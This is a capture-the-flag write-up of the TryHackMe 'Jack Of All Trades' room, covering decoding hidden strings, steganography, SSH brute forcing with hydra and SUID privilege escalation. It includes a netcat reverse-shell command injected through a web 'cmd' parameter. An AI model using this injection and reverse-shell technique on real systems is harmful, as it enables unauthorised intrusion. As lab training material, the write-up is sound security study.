TryHackMe - Jack Of All Trades
A new hacking journey, there are 2 flags waiting for us (user and root), let’s get them and conquer this challenge!
I started with a scan of the IP address I got, to see what we have running on the server. I found 2 open ports, 22 and 80, but there was something weird. The services that normally run on them were reversed, we had http on port 22 and ssh on port 80. Kinda weird, to be honest, but I went on with the analysis.
I configured the proxy settings in Firefox to be able to access the website on port 22. Not too much on its main page, just some things about Jack. Well, we could say that we have a potential user to work with later.
I checked then the source code for this page and I found something in a comment, a subpage of the website and something that looked like and encoded string. Checking it, I figured out that it was encoded in base64.
I took that code and decoded it’s content, I got a password.
For the moment, I didn’t have too much to work with. I tried to ssh using “jack” as user and the one I just discovered as password but it didn’t work. But, I remembered that I have a page mentioned in the comment where I also got the base64 string. I tried to login there with the same credentials, but still didn’t work.
I checked the source code for this page and I found another encoded string.
I had a look at it and, based on the characters I saw that it had, I figured out it was base32 (you can also use online tools to detect the encoding type, there are plenty). After decoding it, it gave me a result that was encoded in hex. Decoded that one also and…guess what? Still an encoded string, but this time looked very clear that there has been encoded with Caesar Cipher. Checked all 26 possibilities and one of them finally gave an answer. It was a link, but when I accessed it, I just got an wikipedia page. Nothing too relevant though (at least that’s what I thought at that point, but it has a clue though - I discovered that in a different way).
Anyway, I also performed a scan with gobuster, to see if I can find some sub pages. After a simple scan (small.txt file was used), I found a subdirectory.
I accessed that page and I found some photos. The name of one of them made me suspect that there was some steganography involved so I checked if there was something there.
I checked that file with steghide, it asked me for a password. I remembered that I found a password at the beginning and I typed that one, it worked. I got a text file but I didn’t have there any info that I thought at. But it confirmed me that what I was doing was ok, I just had to check with a different image.
After doing the same thing, using the same password as before, with a different image, I found a file where I got some credentials! My first reaction was to try to connect via ssh with them, thing that I attempted, but it didn’t work.
Then, I remembered about the sub page I discovered earlier, that had a login form. I used those credentials and I got it!
Well, we have a message where we are told that, somehow, we should get him a ‘cmd’ and it will run that. Looked like ‘cmd’ would be the id, so I tried to run an simple command, ‘ls’. I added at the end of the URL “?cmd=ls” and pressed Enter. Seeing that it showed me 2 index.php files made me realise that we can exploit that. The next step? Run a command that involves a reverse shell, in order to get access to the server. Instead of “ls”, now I added the command to get the reverse shell, the whole needed part in the URL becoming :
?cmd=nc <MyTryHackMeIP> 4444 -e /bin/bash
Anyway, in order for this to work, I previously started a listener on port 4444 on my machine, with netcat, the command I used being nc -lvnp 4444.
After getting the access as www-data user, I spawned a shell in order to work better and checked the /home directory to see what user folders I can find. I saw the home folder of jack (I tried to enter but the permissions didn’t allow me) and another file, owned by root, named jacks_password_list. And there were full read permissions on it.
Well, I checked the content of that and there were several passwords inside. I saved them locally in a file. I tried again to ssh with the passwords from that list, using hydra, and, finally, I got in as jack!
I thought the flag was in a text file but the only thing I saw was a photo. I downloaded it locally, by running the following command in my local terminal:
scp -P 80 jack@10.10.94.26:/home/jack/user.jpg .
When I opened the image, the flag was written on it, as you can see below:
Now all I had left was the root flag. I checked if I could run any commands with sudo but I wasn’t able to. I also verified if there were any cron jobs that I could exploit but there wasn’t anything to work with. So I decided to upload linpeas.sh from my machine to the victim’s one. I started a http server with python3 in the location where I had the script I mentioned above and I used wget on the shell where I was connected as jack to download it. After getting it, I ran the script and checked if I could get anything useful to exploit.
Among the SUID files, I saw /usr/bin/strings, so I decided to use that to read the root flag file.
I assumed that this time I wasn’t getting a picture again, I tried to get the content of /root/root.txt using /usr/bin/strings executable and it worked, I managed to get the root flag.
That’s it, I found both flags required! I hope you found this useful!
